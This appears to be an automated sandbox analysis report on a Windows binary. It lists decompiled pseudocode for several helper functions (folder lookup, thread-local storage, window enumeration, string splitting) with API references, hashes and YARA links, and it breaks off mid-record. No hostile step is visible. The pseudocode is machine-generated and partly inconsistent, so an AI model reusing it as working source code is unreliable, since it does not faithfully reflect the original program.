Opcode Fuzzy Hash: 81cbbaf9a2bb25f669f5b054791e3fa14d7c6e9058cb5600c4bd8963ee11386a
Instruction Fuzzy Hash: 70A1BD71504301AFCB209F18C88166BB7B1EF94348F05093EFD86A7395E77AD925CB9A

Uniqueness

Uniqueness Score: -1.00%

Function 0040A7DA, Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 91
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E0040A7DA(void* __eflags, char _a8) {
				signed int _v4;
				wchar_t* _v8;
				signed int _t11;
				int _t14;
				_Unknown_base(*)()* _t18;
				int _t23;
				struct HINSTANCE__* _t24;
				wchar_t* _t26;
				int _t27;
				void* _t31;

				_t27 = 0;
				_t26 = E0040E200(0x104, _a8);
				_t11 = _v4;
				if(_t11 != 2) {
					if(_t11 > 9) {
						L20:
						E0040E350(_t25, 0x104 - _t27);
						 *((short*)(_t26 + _t27 * 2)) = 0;
						return 0;
					}
					switch( *((intOrPtr*)(_t11 * 4 +  &M0040A8D2))) {
						case 0:
							L18:
							_t14 = E0040A90C(_t28, _t26);
							L19:
							_t27 = _t14;
							goto L20;
						case 1:
							_push(0x26);
							goto L17;
						case 2:
							goto L20;
						case 3:
							_push(5);
							goto L17;
						case 4:
							_push(0x1a);
							goto L17;
						case 5:
							_push(0x23);
							goto L17;
						case 6:
							_push(0xe);
							goto L17;
						case 7:
							_push(0xd);
							goto L17;
						case 8:
							_push(0x27);
							goto L17;
						case 9:
							_push(0x2e);
							L17:
							_pop(_t28);
							goto L18;
					}
				}
				_t24 = LoadLibraryW(L"Shell32.DLL");
				if(_t24 == 0) {
					L6:
					E0040A90C(0x28, _t26);
					wcscat(_t26, L"Downloads\\");
					_t14 = wcslen(_t26);
					goto L19;
				}
				_t18 = GetProcAddress(_t24, "SHGetKnownFolderPath");
				 *0x4170f8 = _t18;
				if(_t18 != 0) {
					_t25 =  &_a8;
					_push( &_a8);
					_push(0);
					_push(0);
					_push(0x41611c);
					if( *_t18() == 0) {
						wcscpy(_t26, _v8);
						wcscat(_t26, "\\");
						_t23 = wcslen(_t26);
						_t31 = _t31 + 0x14;
						_t27 = _t23;
						__imp__CoTaskMemFree(_v8);
					}
				}
				FreeLibrary(_t24);
				if(_t27 != 0) {
					goto L20;
				} else {
					goto L6;
				}
			}

APIs

Part of subcall function 0040E200: TlsGetValue.KERNEL32(0000001B,00001000,00000000,00000000), ref: 0040E20C
Part of subcall function 0040E200: RtlReAllocateHeap.NTDLL(02760000,00000000,?,?), ref: 0040E267

LoadLibraryW.KERNEL32(Shell32.DLL,00000104,?,?,?,?,00000009,00403791,00000001,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 0040A803
GetProcAddress.KERNEL32(00000000,SHGetKnownFolderPath), ref: 0040A815
wcscpy.MSVCRT ref: 0040A83B
wcscat.MSVCRT ref: 0040A846
wcslen.MSVCRT ref: 0040A84C
CoTaskMemFree.OLE32(?,00000000,00000000,?,02769340,00000000,00000000), ref: 0040A85A
FreeLibrary.KERNEL32(00000000,?,?,?,00000009,00403791,00000001,00000000,00000000,00000000,?,00000000,00000000,00000000,004046B8,00000000), ref: 0040A861
wcscat.MSVCRT ref: 0040A879
wcslen.MSVCRT ref: 0040A87F

Strings

Downloads\, xrefs: 0040A873
Shell32.DLL, xrefs: 0040A7FE
SHGetKnownFolderPath, xrefs: 0040A80F

Memory Dump Source

Source File: 00000011.00000002.426008947.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000011.00000002.426001613.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000011.00000002.426024616.0000000000412000.00000002.00020000.sdmp Download File
Associated: 00000011.00000002.426032524.0000000000416000.00000004.00020000.sdmp Download File
Associated: 00000011.00000002.426040172.0000000000418000.00000002.00020000.sdmp Download File

Similarity

API ID: FreeLibrarywcscatwcslen$AddressAllocateHeapLoadProcTaskValuewcscpy
String ID: Downloads\$SHGetKnownFolderPath$Shell32.DLL
API String ID: 1878685483-287042676
Opcode ID: d8047ec1b211d1abfdd77f67eb398c2beda1c06acf7c2fe8683d516af209cf70
Instruction ID: a59125e26d23ccb30f5fa0f47659a7dbf798ada992acc4f36018911529e702ca
Opcode Fuzzy Hash: d8047ec1b211d1abfdd77f67eb398c2beda1c06acf7c2fe8683d516af209cf70
Instruction Fuzzy Hash: 0D210A32244301B6E11037A2AD4AF6B3A68CB41B94F10843BFD01B51C1D6BC897696AF

Uniqueness

Uniqueness Score: -1.00%

Function 00411D62, Relevance: 19.6, APIs: 13, Instructions: 74
memoryregistrythreadCOMMON

Download Yara Rule

C-Code - Quality: 90%

			E00411D62(intOrPtr _a4, intOrPtr _a8) {
				void* _t11;
				void** _t12;
				void* _t13;
				void* _t14;
				void* _t20;
				void* _t24;
				HANDLE* _t25;

				if( *0x417678 == 0) {
					 *0x417698 = TlsAlloc();
					InitializeCriticalSection(0x417680);
					 *0x417678 = 1;
				}
				_t20 = TlsGetValue( *0x417698);
				if(_t20 != 0) {
					L7:
					_t11 = HeapAlloc( *0x417008, 0, 0xc);
					if(_t11 != 0) {
						 *((intOrPtr*)(_t11 + 4)) = _a4;
						 *((intOrPtr*)(_t11 + 8)) = _a8;
						 *_t11 =  *(_t20 + 8);
						 *(_t20 + 8) = _t11;
						return _t11;
					}
				} else {
					_t11 = HeapAlloc( *0x417008, 8, 0x14);
					_t20 = _t11;
					if(_t20 != 0) {
						EnterCriticalSection(0x417680);
						_t12 =  *0x41767c; // 0x0
						if(_t12 != 0) {
							 *_t12 = _t20;
						}
						 *(_t20 + 4) = _t12;
						 *0x41767c = _t20;
						LeaveCriticalSection(0x417680);
						_t25 = _t20 + 0x10;
						_t13 = GetCurrentProcess();
						_t14 = GetCurrentThread();
						DuplicateHandle(GetCurrentProcess(), _t14, _t13, _t25, 0x100000, 0, 0);
						_t3 = _t20 + 0xc; // 0xc
						__imp__RegisterWaitForSingleObject(_t3,  *_t25, E00411E5A, _t20, 0xffffffff, 8, _t24);
						TlsSetValue( *0x417698, _t20);
						goto L7;
					}
				}
				return _t11;
			}

APIs

TlsAlloc.KERNEL32(?,?,0040DFB8,0040DF20,00000000,?,00402F4D,00000000,00000000,00000000,00000000,?,0040117C,00000000,00000000,00000004), ref: 00411D72
InitializeCriticalSection.KERNEL32(00417680,?,?,0040DFB8,0040DF20,00000000,?,00402F4D,00000000,00000000,00000000,00000000,?,0040117C,00000000,00000000), ref: 00411D7E
TlsGetValue.KERNEL32(?,?,0040DFB8,0040DF20,00000000,?,00402F4D,00000000,00000000,00000000,00000000,?,0040117C,00000000,00000000,00000004), ref: 00411D94
HeapAlloc.KERNEL32(00000008,00000014,?,?,0040DFB8,0040DF20,00000000,?,00402F4D,00000000,00000000,00000000,00000000,?,0040117C,00000000), ref: 00411DAE
EnterCriticalSection.KERNEL32(00417680,?,?,0040DFB8,0040DF20,00000000,?,00402F4D,00000000,00000000,00000000,00000000,?,0040117C,00000000,00000000), ref: 00411DBF
LeaveCriticalSection.KERNEL32(00417680,?,?,?,0040DFB8,0040DF20,00000000,?,00402F4D,00000000,00000000,00000000,00000000,?,0040117C,00000000), ref: 00411DDB
GetCurrentProcess.KERNEL32(00000000,00100000,00000000,00000000,?,?,?,0040DFB8,0040DF20,00000000,?,00402F4D,00000000,00000000,00000000,00000000), ref: 00411DF4
GetCurrentThread.KERNEL32 ref: 00411DF7
GetCurrentProcess.KERNEL32(00000000,?,?,?,0040DFB8,0040DF20,00000000,?,00402F4D,00000000,00000000,00000000,00000000,?,0040117C,00000000), ref: 00411DFE
DuplicateHandle.KERNEL32(00000000,?,?,?,0040DFB8,0040DF20,00000000,?,00402F4D,00000000,00000000,00000000,00000000,?,0040117C,00000000), ref: 00411E01
RegisterWaitForSingleObject.KERNEL32 ref: 00411E17
TlsSetValue.KERNEL32(00000000,?,?,?,0040DFB8,0040DF20,00000000,?,00402F4D,00000000,00000000,00000000,00000000,?,0040117C,00000000), ref: 00411E24
HeapAlloc.KERNEL32(00000000,0000000C,?,?,0040DFB8,0040DF20,00000000,?,00402F4D,00000000,00000000,00000000,00000000,?,0040117C,00000000), ref: 00411E35

Memory Dump Source

Source File: 00000011.00000002.426008947.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000011.00000002.426001613.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000011.00000002.426024616.0000000000412000.00000002.00020000.sdmp Download File
Associated: 00000011.00000002.426032524.0000000000416000.00000004.00020000.sdmp Download File
Associated: 00000011.00000002.426040172.0000000000418000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocCriticalCurrentSection$HeapProcessValue$DuplicateEnterHandleInitializeLeaveObjectRegisterSingleThreadWait
String ID:
API String ID: 298514914-0
Opcode ID: bdee7e9acd0791c466288ec044d2aaab850532c309e9e3b615f344bc37c153a3
Instruction ID: 8d0ee0ed933d17ffb5573716605f6a27c21e7768710c452de208be154d108613
Opcode Fuzzy Hash: bdee7e9acd0791c466288ec044d2aaab850532c309e9e3b615f344bc37c153a3
Instruction Fuzzy Hash: 91210770645301EFDB109FA4FC88B963B7AFB08761F11C43AFA059A2A5DB74D840CB68

Uniqueness

Uniqueness Score: -1.00%

Function 0040D9E3, Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 53
librarysleeploaderCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E0040D9E3(void* __ecx, LONG* _a4, intOrPtr _a8) {
				char _v8;
				struct HINSTANCE__* _t5;
				long _t7;
				int _t9;
				_Unknown_base(*)()* _t10;
				void* _t13;
				struct HINSTANCE__* _t18;
				LONG* _t21;

				_t13 = 0;
				_t5 = LoadLibraryW( &M00412700);
				_t21 = _a4;
				_t18 = _t5;
				if(_t18 == 0) {
					L4:
					_t7 = InterlockedCompareExchange(_t21, 1, 0);
					if(_t7 == 0) {
						_a8();
						_t9 = InterlockedExchange(_t21, 2);
					} else {
						_t9 = _t7 - 1;
						if(_t9 == 0) {
							while( *_t21 != 2) {
								Sleep(0);
							}
						}
					}
				} else {
					_t10 = GetProcAddress(_t18, "InitOnceExecuteOnce");
					if(_t10 != 0) {
						 *_t10(_t21, E0040D9C3, _a8,  &_v8);
						_t13 = 1;
					}
					_t9 = FreeLibrary(_t18);
					if(_t13 == 0) {
						goto L4;
					}
				}
				return _t9;
			}

APIs

LoadLibraryW.KERNEL32(Kernel32.dll,00000000,00000000,00000000,00000004,00000000,0040D7F5,00417614,0040D982,00000000,FFFFFFED,00000200,77E34620,00409E16,FFFFFFED,00000010), ref: 0040D9F1
GetProcAddress.KERNEL32(00000000,InitOnceExecuteOnce), ref: 0040DA06
FreeLibrary.KERNEL32(00000000,?,?,?,?,004010C3,00000004,00000015,00000000,00000200,00000200,FFFFFFF5,00000000,00001000,00000000,00000000), ref: 0040DA21
InterlockedCompareExchange.KERNEL32(00000000,00000001,00000000), ref: 0040DA30
Sleep.KERNEL32(00000000,?,?,?,?,004010C3,00000004,00000015,00000000,00000200,00000200,FFFFFFF5,00000000,00001000,00000000,00000000), ref: 0040DA42
InterlockedExchange.KERNEL32(00000000,00000002), ref: 0040DA55

Strings

InitOnceExecuteOnce, xrefs: 0040DA00
Kernel32.dll, xrefs: 0040D9EA

Memory Dump Source

Source File: 00000011.00000002.426008947.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000011.00000002.426001613.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000011.00000002.426024616.0000000000412000.00000002.00020000.sdmp Download File
Associated: 00000011.00000002.426032524.0000000000416000.00000004.00020000.sdmp Download File
Associated: 00000011.00000002.426040172.0000000000418000.00000002.00020000.sdmp Download File

Similarity

API ID: ExchangeInterlockedLibrary$AddressCompareFreeLoadProcSleep
String ID: InitOnceExecuteOnce$Kernel32.dll
API String ID: 2918862794-1339284965
Opcode ID: 6d048d891e2cf8fbf7d8d619f0fa725de381c314969143a28184dc53c1081fbd
Instruction ID: 78d57fd6bf002b5b6c2ef9560121a390c40c5b5e23dd256736785be4ed7191ec
Opcode Fuzzy Hash: 6d048d891e2cf8fbf7d8d619f0fa725de381c314969143a28184dc53c1081fbd
Instruction Fuzzy Hash: 0E01D431B14204BBD7102FE4AC49FEB3B29EB86B12F11803AF505A11C4DB788909CA6D

Uniqueness

Uniqueness Score: -1.00%

Function 004094A7, Relevance: 12.0, APIs: 8, Instructions: 50
threadwindowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004094A7(struct HWND__* _a4) {
				long _t8;
				struct HWND__* _t23;
				intOrPtr* _t25;

				_t23 = _a4;
				_t8 = GetWindowThreadProcessId(_t23, 0);
				if(_t8 == GetCurrentThreadId() && IsWindowVisible(_t23) != 0) {
					_t25 = E0040DB12(0x4170e4, 0x14);
					 *(_t25 + 4) = _t23;
					 *_t25 = GetCurrentThreadId();
					 *((short*)(_t25 + 8)) = 0;
					if((GetWindowLongW(_t23, 0xffffffec) & 0x00000008) != 0) {
						 *((char*)(_t25 + 8)) = 1;
					}
					if(_t23 != GetForegroundWindow() && IsWindowEnabled(_t23) != 0) {
						 *((char*)(_t25 + 9)) = 1;
						EnableWindow(_t23, 0);
					}
				}
				return 1;
			}

0x004094aa
0x004094b1
0x004094c3
0x004094dc
0x004094e0
0x004094e9
0x004094ec
0x004094f8
0x004094fa
0x004094fa
0x00409506
0x00409515
0x00409519
0x00409519
0x00409506
0x00409525

APIs

GetWindowThreadProcessId.USER32(?,00000000), ref: 004094B1
GetCurrentThreadId.KERNEL32 ref: 004094BF
IsWindowVisible.USER32(?), ref: 004094C6

Part of subcall function 0040DB12: HeapAlloc.KERNEL32(00000008,00000000,0040D38C,00417608,00000014,?,?,?,?,00409614,00000010,00000000,00000000,00401071,00000000,00001000), ref: 0040DB1E

GetCurrentThreadId.KERNEL32 ref: 004094E3
GetWindowLongW.USER32(?,000000EC), ref: 004094F0
GetForegroundWindow.USER32 ref: 004094FE
IsWindowEnabled.USER32(?), ref: 00409509
EnableWindow.USER32(?,00000000), ref: 00409519

Memory Dump Source

Source File: 00000011.00000002.426008947.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000011.00000002.426001613.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000011.00000002.426024616.0000000000412000.00000002.00020000.sdmp Download File
Associated: 00000011.00000002.426032524.0000000000416000.00000004.00020000.sdmp Download File
Associated: 00000011.00000002.426040172.0000000000418000.00000002.00020000.sdmp Download File

Similarity

API ID: Window$Thread$Current$AllocEnableEnabledForegroundHeapLongProcessVisible
String ID:
API String ID: 3383493704-0
Opcode ID: 1f4750660798c3bab16e5480091953d12569fa84976fdb8457a986ceb55f5c55
Instruction ID: d72cecd996af7503d4a55556d0eaf5d1fe8b6ec4fae3718c35eb9c11583601b7
Opcode Fuzzy Hash: 1f4750660798c3bab16e5480091953d12569fa84976fdb8457a986ceb55f5c55
Instruction Fuzzy Hash: B10175312043016ED3215B79AC88AAB7AE8EF95754B15803EF545E31A6DB74DC01C669

Uniqueness

Uniqueness Score: -1.00%

Function 00408E54, Relevance: 10.6, APIs: 7, Instructions: 54
memoryCOMMON

Download Yara Rule

C-Code - Quality: 70%

			E00408E54(struct HWND__* _a4, intOrPtr _a8, signed int _a12) {
				intOrPtr _t10;
				void* _t13;
				void* _t19;
				long _t20;
				WCHAR* _t22;
				int _t33;

				_t10 = _a8;
				if(_t10 == 0) {
					UnregisterClassW( *0x416114,  *0x41700c);
					 *0x4170c8 = 1;
				} else {
					_t13 = _t10 - 0xe;
					if(_t13 == 0) {
						L6:
						E00409292();
						DestroyWindow(_a4);
					} else {
						if(_t13 != 0x101) {
							return DefWindowProcW();
						}
						_t19 = (_a12 & 0x0000ffff) - 0x3e8;
						if(_t19 == 0) {
							_t20 = GetWindowLongW(_a4, 0xffffffeb);
							_t5 = GetWindowTextLengthW( *0x4170d0) + 1; // 0x1
							_t33 = _t5;
							_t22 = HeapAlloc( *0x417008, 0, _t33 + _t33);
							 *_t20 = _t22;
							GetWindowTextW( *0x4170d0, _t22, _t33);
							E00409292();
							DestroyWindow(_a4);
						} else {
							if(_t19 == 1) {
								goto L6;
							}
						}
					}
				}
				return 0;
			}

APIs

DestroyWindow.USER32(?), ref: 00408E8D
GetWindowLongW.USER32(?,000000EB), ref: 00408E9C
GetWindowTextLengthW.USER32 ref: 00408EAA
HeapAlloc.KERNEL32(00000000), ref: 00408EBF
GetWindowTextW.USER32 ref: 00408ECF
DestroyWindow.USER32(?), ref: 00408EDD
UnregisterClassW.USER32 ref: 00408EF3

Memory Dump Source

Source File: 00000011.00000002.426008947.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000011.00000002.426001613.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000011.00000002.426024616.0000000000412000.00000002.00020000.sdmp Download File
Associated: 00000011.00000002.426032524.0000000000416000.00000004.00020000.sdmp Download File
Associated: 00000011.00000002.426040172.0000000000418000.00000002.00020000.sdmp Download File

Similarity

API ID: Window$DestroyText$AllocClassHeapLengthLongUnregister
String ID:
API String ID: 2895088630-0
Opcode ID: ceb989c364a64a77ca9268f30e2f22e8c5aea8804ddba6594e2583a28b0bbdfa
Instruction ID: f973f4e0a74c58c8f3dc6b35f62902cd2ce24d79b6cf0357400b1c80f0f6dd69
Opcode Fuzzy Hash: ceb989c364a64a77ca9268f30e2f22e8c5aea8804ddba6594e2583a28b0bbdfa
Instruction Fuzzy Hash: 5011CE3100821AFBCB116F64FD0C9AA3F66EB18395B11C03AF949A22F4DA799951DB58

Uniqueness

Uniqueness Score: -1.00%

Function 00409528, Relevance: 9.1, APIs: 6, Instructions: 68
threadCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00409528(long _a4) {
				int _t11;
				long _t12;
				int _t15;
				intOrPtr* _t16;
				intOrPtr* _t17;
				intOrPtr* _t22;
				intOrPtr* _t23;

				if(_a4 == 0) {
					_t22 =  *0x4170e4; // 0x0
					if(_t22 != 0) {
						do {
							_t16 =  *_t22;
							_t6 = _t22 + 8; // 0x8
							_t25 = _t6;
							_t12 = GetCurrentThreadId();
							if( *_t6 == _t12) {
								if( *((char*)(_t22 + 0x11)) != 0) {
									EnableWindow( *(_t22 + 0xc), 1);
								}
								if( *((char*)(_t22 + 0x10)) != 0) {
									SetWindowPos( *(_t22 + 0xc), 0xffffffff, 0, 0, 0, 0, 3);
								}
								_t12 = E0040DAD2(0x4170e4, _t25);
							}
							_t22 = _t16;
						} while (_t16 != 0);
						return _t12;
					}
				} else {
					_t11 = EnumWindows(E004094A7, _a4);
					_t23 =  *0x4170e4; // 0x0
					if(_t23 != 0) {
						do {
							_t17 =  *_t23;
							_t15 = GetCurrentThreadId();
							if( *((intOrPtr*)(_t23 + 8)) == _t15 &&  *((char*)(_t23 + 0x10)) != 0) {
								_t15 = SetWindowPos( *(_t23 + 0xc), 0xfffffffe, 0, 0, 0, 0, 3);
							}
							_t23 = _t17;
						} while (_t17 != 0);
						return _t15;
					}
				}
				return _t11;
			}

APIs

EnumWindows.USER32(004094A7,?), ref: 0040953B
GetCurrentThreadId.KERNEL32 ref: 00409553
SetWindowPos.USER32(?,000000FE,00000000,00000000,00000000,00000000,00000003,?,?,?,?,?), ref: 0040956F
GetCurrentThreadId.KERNEL32 ref: 0040958F
EnableWindow.USER32(?,00000001), ref: 004095A5
SetWindowPos.USER32(?,000000FF,00000000,00000000,00000000,00000000,00000003,?,?,?,?,?), ref: 004095BC

Memory Dump Source

Source File: 00000011.00000002.426008947.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000011.00000002.426001613.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000011.00000002.426024616.0000000000412000.00000002.00020000.sdmp Download File
Associated: 00000011.00000002.426032524.0000000000416000.00000004.00020000.sdmp Download File
Associated: 00000011.00000002.426040172.0000000000418000.00000002.00020000.sdmp Download File

Similarity

API ID: Window$CurrentThread$EnableEnumWindows
String ID:
API String ID: 2527101397-0
Opcode ID: ce8455a101d240a02109509219b5cc618f809e6c491c4b9dbe06f1833ead8f36
Instruction ID: f5bff55c5df6c6442a3445df2da52706b8c810d9f19cb65a9eb7b3fa66b57753
Opcode Fuzzy Hash: ce8455a101d240a02109509219b5cc618f809e6c491c4b9dbe06f1833ead8f36
Instruction Fuzzy Hash: 6A11AC32609351BBD7324B17EC08F53BBA9AB81B21F15863EF456221E1DB759D00C618

Uniqueness

Uniqueness Score: -1.00%

Function 0040D2F3, Relevance: 9.1, APIs: 6, Instructions: 66
memoryCOMMON

Download Yara Rule

C-Code - Quality: 84%

			E0040D2F3(long _a4, long _a8, long _a12) {
				long _t7;
				long _t8;
				long* _t12;
				void* _t18;
				long _t21;
				signed int _t23;
				long _t28;
				long _t29;
				long _t30;
				void* _t31;

				_t29 = _a4;
				_t23 = _t29 & 0x00000003;
				if(_t23 != 0) {
					_t18 = 4;
					_t29 = _t29 + _t18 - _t23;
				}
				_t7 =  *0x41760c; // 0x10
				if(_t7 == 0) {
					 *0x417610 = TlsAlloc();
					TlsSetValue( *0x417610, HeapAlloc( *0x417008, 8, _t29));
					_t7 =  *0x41760c; // 0x10
				}
				_t28 = _t7;
				_t8 = _t7 + _t29;
				 *0x41760c = _t8;
				_t31 = HeapReAlloc( *0x417008, 8, TlsGetValue( *0x417610), _t8);
				TlsSetValue( *0x417610, _t31);
				_t30 = _a8;
				_t21 = _a12;
				if(_t30 != 0 || _t21 != 0) {
					_t12 = E0040DB12(0x417608, 0x14);
					 *_t12 = _t28;
					_t12[1] = _t30;
					_t12[2] = _t21;
					if(_t30 != 0) {
						 *_t30(_t31 + _t28);
					}
				}
				return _t28;
			}

APIs

TlsAlloc.KERNEL32(?,?,?,?,00409614,00000010,00000000,00000000,00401071,00000000,00001000,00000000,00000000), ref: 0040D318
HeapAlloc.KERNEL32(00000008,00000000,?,?,?,?,00409614,00000010,00000000,00000000,00401071,00000000,00001000,00000000,00000000), ref: 0040D32C
TlsSetValue.KERNEL32(00000000,?,?,?,?,00409614,00000010,00000000,00000000,00401071,00000000,00001000,00000000,00000000), ref: 0040D339
TlsGetValue.KERNEL32(00000010,?,?,?,?,00409614,00000010,00000000,00000000,00401071,00000000,00001000,00000000,00000000), ref: 0040D350
HeapReAlloc.KERNEL32(00000008,00000000,?,?,?,?,00409614,00000010,00000000,00000000,00401071,00000000,00001000,00000000,00000000), ref: 0040D35F
TlsSetValue.KERNEL32(00000000,?,?,?,?,00409614,00000010,00000000,00000000,00401071,00000000,00001000,00000000,00000000), ref: 0040D36E

Memory Dump Source

Source File: 00000011.00000002.426008947.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000011.00000002.426001613.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000011.00000002.426024616.0000000000412000.00000002.00020000.sdmp Download File
Associated: 00000011.00000002.426032524.0000000000416000.00000004.00020000.sdmp Download File
Associated: 00000011.00000002.426040172.0000000000418000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocValue$Heap
String ID:
API String ID: 2472784365-0
Opcode ID: bf16ee7e76be1fa04c8f8f9f6ecfdcdea20948edfbd20feb47145de7ddf136ce
Instruction ID: 9f859b01fecb640b0c0eeeefa64339d4fa0418cdbc8b4e3825918bdf59145f1e
Opcode Fuzzy Hash: bf16ee7e76be1fa04c8f8f9f6ecfdcdea20948edfbd20feb47145de7ddf136ce
Instruction Fuzzy Hash: 76116072B44710AFD7119FA9EC48AA67BB9FB48760B05843AFA04D33A0D7359C048B6C

Uniqueness

Uniqueness Score: -1.00%

Function 00411CE4, Relevance: 9.0, APIs: 6, Instructions: 45
memoryCOMMON

Download Yara Rule

C-Code - Quality: 82%

			E00411CE4(void* _a4) {
				void* _t11;
				long _t16;
				void _t17;
				void* _t18;
				void* _t19;
				void* _t21;

				_t19 = _a4;
				__imp__UnregisterWait( *((intOrPtr*)(_t19 + 0xc)));
				CloseHandle( *(_t19 + 0x10));
				EnterCriticalSection(0x417680);
				_t17 =  *_t19;
				_t11 =  *(_t19 + 4);
				if(_t17 == 0) {
					 *0x41767c = _t11;
				} else {
					 *(_t17 + 4) = _t11;
				}
				_t18 =  *(_t19 + 4);
				if(_t18 != 0) {
					 *_t18 =  *_t19;
				}
				LeaveCriticalSection(0x417680);
				_t16 =  *(_t19 + 8);
				while(_t16 != 0) {
					_t21 = _t16;
					_t16 =  *_t16;
					 *((intOrPtr*)(_t21 + 4))( *((intOrPtr*)(_t21 + 8)));
					HeapFree( *0x417008, 0, _t21);
				}
				return HeapFree( *0x417008, _t16, _t19);
			}

APIs

UnregisterWait.KERNEL32(?), ref: 00411CEE
CloseHandle.KERNEL32(?,?,?,?,00411E6A,?), ref: 00411CF7
EnterCriticalSection.KERNEL32(00417680,?,?,?,00411E6A,?), ref: 00411D03
LeaveCriticalSection.KERNEL32(00417680,?,?,?,00411E6A,?), ref: 00411D28
HeapFree.KERNEL32(00000000,00000000,?,?,?,00411E6A,?), ref: 00411D46
HeapFree.KERNEL32(?,?,?,?,?,00411E6A,?), ref: 00411D58

Memory Dump Source

Source File: 00000011.00000002.426008947.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000011.00000002.426001613.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000011.00000002.426024616.0000000000412000.00000002.00020000.sdmp Download File
Associated: 00000011.00000002.426032524.0000000000416000.00000004.00020000.sdmp Download File
Associated: 00000011.00000002.426040172.0000000000418000.00000002.00020000.sdmp Download File

Similarity

API ID: CriticalFreeHeapSection$CloseEnterHandleLeaveUnregisterWait
String ID:
API String ID: 4204870694-0
Opcode ID: abb9133c54fbe8d7efa3480d1120fe62ec6eeac9e18d1619677bbddffc82dd13
Instruction ID: 8f9f96d7996d446dd79b7cbdc6e3cce5d3da35cfe841f16b8799e142d118698f
Opcode Fuzzy Hash: abb9133c54fbe8d7efa3480d1120fe62ec6eeac9e18d1619677bbddffc82dd13
Instruction Fuzzy Hash: 6B012574202601BFCB119F15FD88A96BB79FF493513118139E61A87630C735AC51CB98

Uniqueness

Uniqueness Score: -1.00%

Function 004057F0, Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 118
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004057F0(void* __ebx, void* __edi, void* __esi, wchar_t* _a4, intOrPtr _a8, wchar_t* _a12, intOrPtr _a16) {
				wchar_t* _v4;
				void* __ecx;
				signed int _t25;
				signed int _t26;
				void* _t27;
				long _t33;
				int _t34;
				wchar_t* _t36;
				wchar_t* _t38;
				int _t40;
				void* _t41;
				wchar_t* _t42;
				intOrPtr _t44;
				long* _t45;
				void* _t47;
				void* _t48;
				wchar_t* _t51;
				wchar_t* _t52;
				wchar_t* _t53;
				int _t55;
				void* _t60;

				_t44 = _a8;
				_t55 = 0;
				if(_t44 < 1) {
					return E0040E2A0(_t41, _a16);
				} else {
					_t51 = _a4;
					if(_t51 == 0) {
						_t51 = 0x412024;
					}
					_t42 = _a12;
					if(_t42 == 0) {
						_t42 = 0x412024;
						_a12 = 0x412024;
					}
					_t25 =  *_t42 & 0x0000ffff;
					_t47 = 0;
					_v4 = _t25;
					_t36 = _t51;
					_a4 = _t36;
					if(_t25 == 0 || _t42[0] == 0) {
						_t42 = _v4;
						while(1) {
							_t26 =  *_t51 & 0x0000ffff;
							if(_t26 == _t42 || _t26 == 0) {
								goto L20;
							}
							L23:
							_t51 =  &(_t51[0]);
							continue;
							L20:
							_t47 = _t47 + 1;
							if(_t47 == _t44) {
								_t55 = _t51 - _t36 >> 1;
							} else {
								if(_t26 != 0) {
									_t17 =  &(_t51[0]); // 0x0
									_t36 = _t17;
									goto L23;
								}
							}
							goto L26;
						}
					} else {
						_t38 = _t42;
						_t8 =  &(_t38[0]); // 0x412026
						_t45 = _t8;
						do {
							_t33 =  *_t38;
							_t38 =  &(_t38[0]);
						} while (_t33 != 0);
						_t40 = _t38 - _t45 >> 1;
						while(1) {
							L10:
							_t34 = wcsncmp(_t51, _t42, _t40);
							_t60 = _t60 + 0xc;
							if(_t34 != 0 &&  *_t51 != _t55) {
								break;
							}
							_t47 = _t47 + 1;
							if(_t47 == _a8) {
								_t36 = _a4;
								_t55 = _t51 - _t36 >> 1;
							} else {
								if( *_t51 == _t55) {
									_t36 = _a4;
								} else {
									_t42 = _a12;
									_t51 = _t51 + _t40 * 2;
									_a4 = _t51;
									continue;
								}
							}
							goto L26;
						}
						_t42 = _a12;
						_t51 =  &(_t51[0]);
						goto L10;
					}
					L26:
					_t27 = E0040E180(_t42, _t51);
					_t52 = _a12;
					_t48 = _t27;
					if(_t48 != 0) {
						memmove(E0040E1D0(_t42, _t52), _t36, _t55 * 2);
						_t60 = _t60 + 0xc;
					}
					_t53 = E0040E200(_t55, _t52);
					if(_t48 == 0) {
						wcsncpy(_t53, _t36, _t55);
					}
					 *((short*)(_t53 + _t55 * 2)) = 0;
					return 0;
				}
			}

APIs

wcsncmp.MSVCRT(00000000,?,?,?,?,-0000012C,?,?,004022A6,00000000,00000002,00000000,00000000,00416020,00000001,00000000), ref: 00405853
memmove.MSVCRT ref: 004058E1
wcsncpy.MSVCRT ref: 004058F9

Strings

$ A, xrefs: 00405819
$ A, xrefs: 0040580C

Memory Dump Source

Source File: 00000011.00000002.426008947.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000011.00000002.426001613.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000011.00000002.426024616.0000000000412000.00000002.00020000.sdmp Download File
Associated: 00000011.00000002.426032524.0000000000416000.00000004.00020000.sdmp Download File
Associated: 00000011.00000002.426040172.0000000000418000.00000002.00020000.sdmp Download File

Similarity

